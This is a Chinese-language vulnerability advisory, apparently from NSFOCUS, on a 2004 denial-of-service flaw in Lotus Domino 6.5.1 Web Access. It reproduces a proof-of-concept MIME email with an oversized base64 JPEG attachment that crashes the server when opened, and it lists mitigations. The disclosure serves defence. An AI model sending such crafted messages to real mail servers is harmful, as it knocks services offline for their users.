发布日期：2004-06-30
更新日期：2004-07-05

受影响系统：

Lotus Domino 6.5.1

描述：

---

BUGTRAQ  ID: 10641
CVE(CAN) ID: CVE-2004-0668

Lotus Domino/Notes服务器是一款基于WEB合作的应用程序架构，运行在Linux/Unix和Microsoft Windows操作系统平台下。

IBM Lotus Domino服务器不正确处理部分恶意邮件，远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。

攻击者可以打开邮件程序，然后写一段如下消息发送给通过Domino Web Access读取邮件的用户：

--- snip here; do not paste this line --
Content-Disposition: Attachment; filename="PC210017.JPG"
Content-Type: image/jpeg;
Name="PC210017.JPG"
Content-Transfer-Encoding: Base64

/9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA
ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB
AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN
[Add here some megabytes of data. 1kB is not enough, but 12MB was
sufficient in all my tests]
--- snip here; do not pste this line ---

这样当接收者在Domino Web Access中打开邮件时，可导致Domino服务器崩溃。

<*来源：Andreas Klein （Andreas.C.Klein@physik.uni-wuerzburg.de）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=108871093704307&w=2
*>

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 限制邮件最大字节数或者关闭web-access。

厂商补丁：

Lotus
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.lotus.com/home.nsf/welcome/domino

浏览次数：3690
严重程度：0（网友投票）